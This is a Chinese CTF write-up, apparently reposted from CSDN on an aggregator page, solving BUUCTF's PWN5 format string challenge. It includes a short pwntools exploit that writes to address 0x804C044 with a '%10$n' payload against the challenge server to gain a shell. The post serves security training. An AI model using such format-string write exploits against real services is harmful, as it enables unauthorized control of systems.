(Buuctf) [第五空间2019 决赛]PWN5 简单格式化字符串漏洞利用 - 代码天地

(Buuctf) [第五空间2019 决赛]PWN5 简单格式化字符串漏洞利用

其他 2021-03-26 11:43:25 阅读次数: 0

在这里插入图片描述这题是个基本格式化字符串漏洞利用;

满足if条件即可得到答案;

使 nptr 与 dword_804C044 相等即可;

可以使我们利用的是第一次的输入输出;

addr=0x804C044
payload=p32(addr)+'%10$n'

先得出偏移量:
在这里插入图片描述

from pwn import *
p=remote('node3.buuoj.cn',26937)
addr=0x804C044
payload=p32(addr)+'%10$n'
p.sendline(payload)
p.sendline('4')
p.interactive()

有问题欢迎留言 ❄

猜你喜欢

转载自blog.csdn.net/weixin_45556441/article/details/115219330

(Buuctf) [第五空间2019 决赛]PWN5 简单格式化字符串漏洞利用

[BUUCTF]PWN——[第五空间2019 决赛]PWN5

pwn BUUCTF第五空间决赛pwn5

[第五空间2019 决赛]PWN5

【BUUCTF - PWN】PWN5

BUUCTF-PWN刷题记录-18（格式化字符串漏洞）

[BUUCTF]PWN——gyctf_2020_some_thing_interesting（格式化字符串+UAF）

[BUUCTF]PWN——ciscn_2019_ne_5

Buuctf(pwn) ciscn_2019_n_5

buuctf pwn（5~8）

pwn-格式化字符串漏洞

pwn初识格式化字符串漏洞

pwn学习（格式化字符串漏洞）

【BUUCTF - PWN】ciscn_2019_n_8

【BUUCTF - PWN】ciscn_2019_en_2

【BUUCTF - PWN】ciscn_2019_c_1

【BUUCTF - PWN】ciscn_2019_n_1

[BUUCTF-pwn]——[OGeek2019]babyrop

[BUUCTF]PWN——ciscn_2019_final_2

Buuctf(pwn)ciscn_2019_n_8

Buuctf(PWN)ciscn_2019_c_1

Buuctf(pwn)[OGeek2019]babyrop

pwn学习-格式化字符串的利用

BUUCTF ciscn_2019_ne_5

buuctf ciscn_2019_sw_5

BUUCTF-PWN ciscn_2019_final_5（临界条件错误，劫持GOT表项）

[BUUCTF]PWN——铁人三项(第五赛区)_2018_rop

Bugku pwn5

BUUCTF bbys_tu_2016&&xm_2019_awd_pwn2

buuctf-pwn刷题-axb_2019_heap

今日推荐

TIOBE 5 月榜单：Fortran “复活”进入 Top 10

GCC 14.1 发布

面壁智能发布 Eurux-8x22B 开源大模型 —— 堪称「理科状元」

开源日报 | 谷歌扶持鸿蒙上位；开源Rabbit R1；Docker加持的安卓手机；微软的焦虑和野心；海尔电器把开放平台关了

中国码农的“35岁魔咒”

蘭雅 CorelDRAW 插件 2024.5.1 国际劳动节版，免费下载

Arc Browser for Windows 1.0 正式 GA

90后程序员开发视频搬运软件、不到一年获利超 700 万，结局很刑！

周排行

Java自定义时间格式

同步整形电路

在开发中最最最常用的字符串的属性大集合

Linux 查看端口占用并杀掉

Java基础四：ArrayList

多线程之死锁就是这么简单

mysql 基础命令集

awk 命令详解

Centos6.3编译安装nginx+php步骤

OCR （Optical Character Recognition，光学字符识别）

每日归档

更多

2024-05-08(42)

2024-05-07(14)

2024-05-06(40)

2024-05-05(0)

2024-05-04(7)

2024-05-03(19)

2024-05-02(0)

2024-05-01(4)

2024-04-30(1)

2024-04-29(40)